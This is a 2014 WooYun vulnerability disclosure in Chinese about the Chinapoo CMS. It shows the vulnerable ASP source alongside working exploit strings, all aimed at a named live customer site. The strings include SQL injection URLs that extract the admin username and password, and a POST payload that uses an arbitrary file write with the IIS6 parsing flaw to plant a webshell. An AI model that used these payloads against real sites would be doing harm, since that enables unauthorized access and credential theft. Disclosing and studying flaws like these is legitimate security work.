当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061130

漏洞标题:中普网建站系统多个漏洞导致多家企业沦陷

相关厂商:中普网

漏洞作者: Gavin

提交时间:2014-05-17 17:52

修复时间:2014-08-15 17:54

公开时间:2014-08-15 17:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

很多电影院和企业采用这套建站系统,存在多个漏洞,可获取shell。

详细说明:

0x00:中普网(http://www.chinapoo.cn/)的这套系统是不公开下载的,但是由于某个子站管理不当,管理员将网站程序打包放到网站目录下,被我下载了一套,之前为cncert提供过一次这个建站系统的多个漏洞,最近又分析了一下代码,之前的漏洞已经修补了,但仍然发现存在很多漏洞,由于上次拿了官网的shell,目前官网用了IIS防护软件,所以不好拿来演示,但是官网有一个栏目展示他们的很多作品(客户网站),很贴心,我们随便挑一个来演示吧。
http://www.chinapoo.cn/info/listinfo.dll?infoid=218

q.png


本次演示我们就拿其中一个商城来演示:
http://www.xinfangsheng.com/
PS:脚本后缀都为dll,其实就是asp。
0x01,SQL注入漏洞,这次又发现另外一处注入。
/sub/link.dll

ver=request("ver")
if ver="" then
ver="cn"
end if
sss=sss&"<table width=100% border=0 align=center>"
set rs=conn.execute("select name,url,pic from link where s=0 and ver='"&ver&"' order by px,id desc")
if not rs.eof then
x=1
do until rs.eof
name=trim(prox.makeshtml3(rs("name")))
nx=name


利用代码:
http://www.xinfangsheng.com/sub/link.dll?ver=1%27/**/and/**/%28select/**/top/**/1/**/ausn/**/from/**/uadmin%29=1--

s1.png


http://www.xinfangsheng.com/sub/link.dll?ver=1%27/**/and/**/%28select/**/top/**/1/**/apwd/**/from/**/uadmin%29=1--

s2.png


0x02,解密密码:通过注入拿到帐号和密码了,但是这个密码并不是常规加密,是网站自己写的一个加密算法,只要找到他的加密函数,调用即可。

mm.png


因此获取出来的帐号和密码为Chinapoo/Chinapoo
其实也算得上是弱口令了...我猜测其它的站没准也会用这个口令...
0x03,后台篇:
后他的地址也比较好猜(将常见的字典后缀改为.dll扫一下即可)
http://www.xinfangsheng.com/admin/manage.dll

h1.png


进入后台以后,通过常见的一些上传绕过无法成功。只能通过代码继续深入...
0x04,任意写文件-getshell:
Admin/admin/spower.dll

<%
id=request("id")
if id="" or not isnumeric(id) then
call prox.smsg("参数错误!","")
response.end
end if
stp=request("stp")
if stp="i" then
bn="isort"
else
bn="psort"
end if
ver=request("ver")
if ver="" then
ver="cn"
end if
if request.ServerVariables("HTTP_METHOD")="POST" then
apower=request("hid")
if apower<>"" then
apower=replace(apower,", ",",")
end if
call creatfile("/admin/admin/pow/",stp&id&".inc",apower)
call prox.smsg("操作成功!","")
end if
%>


因为采用asp开发,很多站都用的IIS6,官网也是一样。结合IIS6解析漏洞来getshell。
必须使用POST发送,并且要修改Referer:
http://www.xinfangsheng.com/Admin/admin/spower.dll
id=11&stp=c.dll;&hid=%3c%25response.write(%22Test%20By%20Gavin%22)%25%3e

g1.png


gg.png


g2.png

漏洞证明:

g2.png


修复方案:

版权声明:转载请注明来源 Gavin@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝